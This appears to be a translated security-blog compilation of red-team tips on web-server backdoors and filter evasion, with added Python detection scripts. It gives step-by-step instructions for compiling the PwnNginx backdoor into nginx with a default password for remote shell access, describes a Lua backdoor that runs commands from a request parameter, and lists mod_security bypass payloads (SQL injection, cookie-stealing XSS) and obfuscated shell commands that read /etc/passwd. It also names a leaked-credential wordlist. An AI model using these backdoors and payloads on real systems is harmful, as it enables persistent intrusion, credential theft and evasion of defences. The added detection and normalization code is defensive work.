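        if fname.endswith('.load') and len(directives) > 1:
            findings.append(('extra_loadmodule', fname, [name for name, _ in directives]))
        for mod_name, so_path in directives:
            on_disk = os.path.join(root, so_path.lstrip('/'))
            if so_path not in manifest:
                findings.append(('unpackaged_module', mod_name, so_path))
            elif not os.path.isfile(on_disk):
                findings.append(('missing_file', mod_name, so_path))
            elif md5_of(on_disk) != manifest[so_path]:
                findings.append(('hash_mismatch', mod_name, so_path))
    return findings


def build_demo():
    """Constructed mini root: a packaged PHP module, a replaced mod_status.so, a LoadModule
    smuggled into php7.0.load, and a hand-built mod_auth.so with the auth.load apxs -a writes."""
    root = tempfile.mkdtemp()
    mods = os.path.join(root, 'usr/lib/apache2/modules')
    enabled = os.path.join(root, 'etc/apache2/mods-enabled')
    info = os.path.join(root, 'var/lib/dpkg/info')
    for d in (mods, enabled, info):
        os.makedirs(d)
    blobs = {'libphp7.0.so': b'\x7fELF php', 'mod_status.so': b'\x7fELF status (tampered)',
             'mod_phpdevmod.so': b'\x7fELF backdoor 3', 'mod_auth.so': b'\x7fELF backdoor 1'}
    for name, data in blobs.items():
        with open(os.path.join(mods, name), 'wb') as fh:
            fh.write(data)
    # dpkg knows only the two packaged modules, and recorded mod_status.so's original hash.
    manifest = [hashlib.md5(blobs['libphp7.0.so']).hexdigest() + '  usr/lib/apache2/modules/libphp7.0.so',
                hashlib.md5(b'\x7fELF status').hexdigest() + '  usr/lib/apache2/modules/mod_status.so']
    with open(os.path.join(info, 'apache2-bin.md5sums'), 'w') as fh:
        fh.write('\n'.join(manifest) + '\n')
    configs = {
        'php7.0.load': 'LoadModule php7_module /usr/lib/apache2/modules/libphp7.0.so\n'
                       'LoadModule phpdevmod_module /usr/lib/apache2/modules/mod_phpdevmod.so\n'
                       '<Location /qq.jpg>\n    SetHandler phpdevmod\n</Location>\n',
        'status.load': 'LoadModule status_module /usr/lib/apache2/modules/mod_status.so\n',
        'auth.load': 'LoadModule auth_module /usr/lib/apache2/modules/mod_auth.so\n',
    }
    for name, text in configs.items():
        with open(os.path.join(enabled, name), 'w') as fh:
            fh.write(text)
    return root


def demo():
    root = build_demo()
    manifest = load_dpkg_manifest(os.path.join(root, 'var/lib/dpkg/info'))
    return audit(os.path.join(root, 'etc/apache2/mods-enabled'), manifest, root)


if __name__ == '__main__':
    for finding in demo():
        print(*finding)
```

On a real host call `audit('/etc/apache2/mods-enabled', load_dpkg_manifest('/var/lib/dpkg/info'))` with the default root. The hash check assumes the attacker has not also edited the md5sums files; if root was obtained, compare against a copy of the .deb or `debsums -c` from trusted media instead.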


Nginx Lua backdoor


From: https://github.com/netxfly/nginx_lua_security
https://github.com/Y4er/Y4er.com/blob/251d88d8a3cf21e9bafe15c43d7900ffeacfa7ea/content/post/nginx-lua-backdoor.md
Prerequisites: root on the target, and an nginx built with the Lua module (ngx_lua / OpenResty).
In nginx.conf, inside the http block, point nginx at the Lua script directory and name the script it runs at startup (typically the lua_package_path and init_by_lua_file directives).

In the Lua directory /waf/, create Init.lua; its `require "nginx"` loads the module defined in nginx.lua.

In /waf/, create nginx.lua, which executes the command passed in the waf parameter.

Add a location for it to the nginx configuration.

Result:
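The backdoor above hides in code nginx already trusts: a Lua file reached through an init or location hook, which in turn `require`s a module found via lua_package_path. Finding it means following exactly that chain. The script below is an added example (not from the article or from either linked repository): it reads nginx.conf, collects every `*_by_lua_file` target, follows `require()` through the lua_package_path templates the way ngx_lua resolves them, and reports any reachable Lua file that calls an execution sink, noting whether that file also reads request input such as ngx.var.arg_waf. The configuration and the three Lua files are constructed in a temporary directory to mirror the /waf/ layout described; `scan`, `collect_lua_files` and the sink/source lists are the example's own.

```python
#!/usr/bin/env python3
"""Find the Lua code nginx executes and flag exec sinks fed by request data."""
import os
import re
import tempfile

PKG_PATH_RE = re.compile(r'lua_package_path\s+"([^"]*)"\s*;')
HOOK_RE = re.compile(r'\b(\w+_by_lua_file)\s+(\S+?)\s*;')        # init_by_lua_file, content_by_lua_file, ...
REQUIRE_RE = re.compile(r'\brequire\s*\(?\s*["\']([\w.]+)["\']')
SINK_RE = re.compile(r'\b(os\.execute|io\.popen|loadstring|dofile)\s*\(')
SOURCE_RE = re.compile(r'\bngx\.(?:var\.arg_\w+|req\.get_uri_args|req\.get_post_args|req\.get_headers|var\.http_\w+)\b')


def resolve_module(name, package_path):
    """require("a.b") -> first ';'-separated template with '?' replaced by a/b that exists on disk."""
    rel = name.replace('.', '/')
    for template in package_path.split(';'):
        if template:                                  # ';;' stands for the default path; skip it
            candidate = template.replace('?', rel)
            if os.path.isfile(candidate):
                return candidate
    return None


def collect_lua_files(conf_text):
    """All Lua files reachable from *_by_lua_file hooks, following require() transitively."""
    match = PKG_PATH_RE.search(conf_text)
    package_path = match.group(1) if match else ''
    files, queue = [], [path for _, path in HOOK_RE.findall(conf_text)]
    while queue:
        path = queue.pop()
        if path in files or not os.path.isfile(path):
            continue
        files.append(path)
        with open(path) as fh:
            for mod in REQUIRE_RE.findall(fh.read()):
                resolved = resolve_module(mod, package_path)
                if resolved:
                    queue.append(resolved)
    return files


def scan(conf_path):
    """Report every reachable Lua file that calls an exec sink, and whether it reads request input."""
    with open(conf_path) as fh:
        conf = fh.read()
    findings = []
    for path in collect_lua_files(conf):
        with open(path) as fh:
            src = fh.read()
        sinks = sorted(set(SINK_RE.findall(src)))
        if sinks:
            findings.append({'file': path, 'sinks': sinks, 'request_input': bool(SOURCE_RE.search(src))})
    return findings


def build_demo():
    """Constructed layout: Init.lua loads nginx.lua at startup, a location calls into it,
    nginx.lua runs the 'waf' parameter through io.popen, status.lua is a benign control."""
    root = tempfile.mkdtemp()
    waf = os.path.join(root, 'waf')
    os.makedirs(waf)
    conf = os.path.join(root, 'nginx.conf')
    with open(conf, 'w') as fh:
        fh.write('http {\n'
                 f'    lua_package_path "{waf}/?.lua;;";\n'
                 f'    init_by_lua_file {waf}/Init.lua;\n'
                 '    server {\n'
                 f'        location /search {{ content_by_lua_file {waf}/search.lua; }}\n'
                 f'        location /status {{ content_by_lua_file {waf}/status.lua; }}\n'
                 '    }\n}\n')
    with open(os.path.join(waf, 'Init.lua'), 'w') as fh:
        fh.write('waf_mod = require "nginx"\n')
    with open(os.path.join(waf, 'search.lua'), 'w') as fh:
        fh.write('waf_mod.run()\n')
    with open(os.path.join(waf, 'nginx.lua'), 'w') as fh:
        fh.write('local _M = {}\n'
                 'function _M.run()\n'
                 '    local cmd = ngx.var.arg_waf\n'
                 '    if cmd then\n'
                 '        local h = io.popen(cmd)\n'
                 '        ngx.say(h:read("*a"))\n'
                 '        h:close()\n'
                 '    end\n'
                 'end\n'
                 'return _M\n')
    with open(os.path.join(waf, 'status.lua'), 'w') as fh:
        fh.write('ngx.say("ok from " .. ngx.var.remote_addr)\n')
    return conf


def demo():
    return scan(build_demo())


if __name__ == '__main__':
    for finding in demo():
        print(finding)
```

Two limitations worth knowing: inline `*_by_lua_block { ... }` code is not covered (grep the configuration for it separately), and `include` directives are not followed, so run `scan` against the output of `nginx -T`, which prints the fully merged configuration.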


PwnNginx

From: https://github.com/t57root/pwnginx
Unpack the archive and build the client:
>make

Edit nginx's source file src/core/nginx.c: find the string `configure arguments:` (the line `nginx -V` prints) and append `--prefix=/usr/local/nginx\n` after it; this is the directory nginx is installed in.


Rebuild nginx with the backdoor module added:
>./configure --prefix=/usr/local/nginx/ --add-module=/tmp/pwnginx-master/module

>make

Overwrite the existing binary with the new nginx:
>cp -f objs/nginx /usr/local/nginx/sbin/nginx

Restart nginx:
>killall nginx; /usr/local/nginx/sbin/nginx

Connect:
>./pwnginx shell <target> <nginx port> <password>
The default password is t57root. It is set in the file pwnginx-master/module/config.h; change it there before rebuilding nginx.


This backdoor can also open a SOCKS tunnel.

Red team tips

Breaking the parent process chain

`explorer.exe /root,<program>` behaves like `cmd.exe /c <program>`, except that going through Explorer breaks the process tree: Windows spawns a new explorer.exe instance and the program becomes a child of that instance instead of the shell that launched it.


Frequently seen IoT account/password pairs


Bypassing mod_security

XSS and injection payloads that bypass mod_security:
/*!50000%75%6e%69on*/ %73%65%6cect 1,2,3,4... --
<marquee loop=1 width=0 onfinish=pr\u006fmpt(document.cookie)>Y000</marquee>
/*!50000%75%6e%69on*/ %73%65%6cect 1,2,3,4,5

How it decodes: %75%6e%69on = union, %73%65%6cect = select (%75%6e%69 is "uni" and %73%65%6c is "sel", URL-encoded). /*!50000 ... */ is a MySQL version-conditional comment: a server at version 5.0.0 or newer executes what is inside it, while a rule that treats it as an ordinary comment never sees the keyword.
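The common thread in these payloads is layering: URL encoding on top of a version comment, a JS \uXXXX escape inside an event handler. A rule that matches the raw bytes sees none of it. The example below is added here and is not from the article or from mod_security's own rule set: `normalize` URL-decodes until the string stops changing, unwraps `/*!NNNNN ... */` comments (keeping their body, as MySQL does), drops ordinary block comments, decodes `\uXXXX`, folds whitespace and lowercases, and only then are the union/select and on*=prompt( rules applied. `naive_match` shows what the raw-payload rule sees for comparison. The sample list is the page's payloads plus a constructed double-encoded variant and a benign control.

```python
#!/usr/bin/env python3
"""Peel the encoding layers used in the bypasses above before matching, not after."""
import re
from urllib.parse import unquote

VERSION_COMMENT_RE = re.compile(r'/\*!\d{0,5}\s*(.*?)\s*\*/', re.DOTALL)   # MySQL executes the body
BLOCK_COMMENT_RE = re.compile(r'/\*.*?\*/', re.DOTALL)                      # plain comments act as whitespace
JS_UNICODE_RE = re.compile(r'\\u([0-9a-fA-F]{4})')                          # pr\u006fmpt -> prompt in JS


def normalize(payload, max_rounds=3):
    """URL-decode until stable, unwrap version comments, drop comments, decode \\uXXXX, fold whitespace."""
    text = payload
    for _ in range(max_rounds):                    # bounded: attackers stack encodings deliberately
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    text = VERSION_COMMENT_RE.sub(r' \1 ', text)
    text = BLOCK_COMMENT_RE.sub(' ', text)
    text = JS_UNICODE_RE.sub(lambda m: chr(int(m.group(1), 16)), text)
    return re.sub(r'\s+', ' ', text).strip().lower()


SQLI_RE = re.compile(r'\bunion\b.*?\bselect\b')
XSS_RE = re.compile(r'\bon\w+\s*=\s*.*?\b(?:prompt|alert|confirm|eval)\s*\(')


def naive_match(payload):
    """What a rule inspecting the raw payload sees: the payloads above slip past it."""
    return bool(re.search(r'union\s+select|onfinish=prompt\(', payload, re.IGNORECASE))


def classify(payload):
    """'sqli', 'xss' or 'clean', decided on the normalized form."""
    normalized = normalize(payload)
    if SQLI_RE.search(normalized):
        return 'sqli'
    if XSS_RE.search(normalized):
        return 'xss'
    return 'clean'


# Payloads from the list above, a constructed double-URL-encoded variant, and a benign control.
SAMPLES = [
    '/*!50000%75%6e%69on*/ %73%65%6cect 1,2,3,4,5',
    r'<marquee loop=1 width=0 onfinish=pr\u006fmpt(document.cookie)>Y000</marquee>',
    '%2f%2a%2150000%2575%256e%2569on%2a%2f%20%2573%2565%256cect%201',
    'id=17 ORDER BY created_at',
]

if __name__ == '__main__':
    for sample in SAMPLES:
        print(f'{classify(sample):5}  raw-rule:{naive_match(sample)!s:5}  {normalize(sample)}')
```

The point is the order of operations: decode, then match. Doing the same with the real engine means enabling the relevant transformations (t:urlDecodeUni, t:removeComments and friends in the CRS) rather than adding more spellings of "union select" to the rule.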

Wordlists for finding exposed git and svn directories


Top 25 open-redirect dorks


Quickly stripping junk with grep

>curl http://host.xx/file.js | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*"
>cat file | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*"
Caveat: the character class contains no `&`, `:`, `%` or `#`, so a URL with a port, a percent-encoded path or more than one query parameter is cut off at that character; widen the class if you need whole URLs.

A wordlist compiled from leaked passwords

https://github.com/FlameOfIgnis/Pwdb-Public
Compiled from about 1 billion credentials leaked online. 257,669,588 entries were filtered out as corrupted data or test accounts. The 1 billion credentials boil down to 168,919,919 passwords and 393,386,953 usernames. The average password length is 9.4822 characters; 12.04% contain special characters, 28.79% are letters only, 26.16% are lowercase only, 13.37% are digits only, and 8.83% of the passwords occur only once. For comparison, rockyou contains 14,344,391 passwords; this list differs from rockyou by 80%. Smaller per-country lists are also provided.

Command injection filter bypasses

From: @shreyasrx
cat /etc/passwd
cat /e"t"c/pa"s"swd
cat /'e'tc/pa's' swd
cat /etc/pa??wd
cat /etc/pa*wd
cat /et' 'c/passw' 'd
cat /et$()c/pa$()$swd
cat /et${neko}c/pas${poi} swd
echo "dwssap/cte/ tac" | rev
$(echo Y2F0IC9ldGMvcGFzc3dkCg== | base64 -d)
w\ho\am\i
/\b\i\n/////s\h
who$@ami
xyz%0Acat%20/etc/passwd
IFS=,;`cat<<<uname,-a`
/???/??t /???/p??s??
test=/ehhh/hmtc/pahhh/hmsswd
cat ${test//hhh\/hm/}
cat ${test//hh??hm/}
cat /???/?????d
{cat,/etc/passwd}
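Every trick in that list exploits a step the shell performs after a filter has already looked at the string: quote removal, backslash escapes, parameter and command substitution, brace expansion, pathname globbing, and a newline smuggled in as %0A. The example below is added here and is not from the tweet or the article: `canonicalize` replays those steps in the shell's order over a constructed in-memory filesystem (`FAKE_FS`) so that the filter's decision (`reads_passwd`) is made on what would actually execute. The variable-based variants are handled under the stated assumption that `${neko}`, `${poi}` and `$@` are unset, and the tests use the spellings without the stray space (pas${poi}swd) since a space splits the argument.

```python
#!/usr/bin/env python3
"""Canonicalize obfuscated shell command lines the way the shell itself would see them."""
import base64
import fnmatch
import os
import re
import shlex
from urllib.parse import unquote

# Constructed stand-in for walking the real filesystem, so the example runs offline.
FAKE_FS = ['/bin/cat', '/bin/sh', '/bin/ls', '/etc/passwd', '/etc/shadow', '/etc/hosts', '/usr/bin/id']

B64_SUBST_RE = re.compile(r'\$\(\s*echo\s+([A-Za-z0-9+/=]+)\s*\|\s*base64\s+(?:-d|--decode)\s*\)')


def expand_substitutions(s):
    """Resolve the expansions the list above uses either as decoders or as no-ops."""
    s = B64_SUBST_RE.sub(lambda m: base64.b64decode(m.group(1)).decode('utf-8', 'replace').strip(), s)
    s = re.sub(r'\$\(\s*\)', '', s)            # $() with nothing inside expands to nothing
    s = s.replace('$@', '')                    # positional parameters: empty for a web-spawned shell
    s = re.sub(r'\$\{[A-Za-z_]\w*\}', '', s)   # ${neko}: assumed unset (assumption of this example)
    s = re.sub(r'\$[A-Za-z_]\w*', '', s)       # $var: same assumption
    return s


def brace_expand(word):
    """{cat,/etc/passwd} -> ['cat', '/etc/passwd'], recursing for nested alternatives."""
    m = re.search(r'\{([^{}]*,[^{}]*)\}', word)
    if not m:
        return [word]
    out = []
    for alt in m.group(1).split(','):
        out.extend(brace_expand(word[:m.start()] + alt + word[m.end():]))
    return out


def path_glob(pattern, fs):
    """Shell-style glob: '?' and '*' never cross a '/', unlike fnmatch on the whole string."""
    want = pattern.split('/')
    hits = []
    for path in fs:
        parts = path.split('/')
        if len(parts) == len(want) and all(fnmatch.fnmatchcase(p, w) for p, w in zip(parts, want)):
            hits.append(path)
    return hits


def resolve_word(word, fs):
    if word.startswith('/'):
        word = os.path.normpath(word)          # /\b\i\n/////s\h is /bin/sh once escapes are gone
    if any(c in word for c in '*?['):
        return path_glob(word, fs) or [word]   # no match: the shell passes the pattern through literally
    return [word]


def canonicalize(cmdline, fs=FAKE_FS):
    """Return the commands the shell would run, with quotes, escapes, substitutions, braces and globs resolved."""
    commands = []
    for raw in re.split(r'[\n;]', unquote(cmdline)):   # %0A and %20 arrive through URL parameters
        raw = expand_substitutions(raw).strip()
        if not raw:
            continue
        words = []
        for token in shlex.split(raw):                 # POSIX quote removal and backslash escapes
            for expanded in brace_expand(token):
                words.extend(resolve_word(expanded, fs))
        commands.append(' '.join(words))
    return commands


def reads_passwd(cmdline, fs=FAKE_FS):
    """The check a filter should make: on the canonical form, never on the raw bytes."""
    return any(cmd.startswith('cat /etc/passwd') for cmd in canonicalize(cmdline, fs))


if __name__ == '__main__':
    for payload in ['cat /e"t"c/pa"s"swd', '/???/??t /???/p??s??', '{cat,/etc/passwd}',
                    'xyz%0Acat%20/etc/passwd', '$(echo Y2F0IC9ldGMvcGFzc3dkCg== | base64 -d)',
                    r'w\ho\am\i', r'/\b\i\n/////s\h', 'who$@ami', 'cat /et${neko}c/pas${poi}swd']:
        print(f'{payload!r:50} -> {canonicalize(payload)}')
```

Even this is an approximation (the IFS and `${test//...}` variants need variable tracking it does not do), which is the practical lesson: a blacklist on the raw string cannot keep up, so the durable fix is to stop passing user input through a shell at all and call the program with an argument vector.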






Follow the WeChat account 「安全先师」 for more.


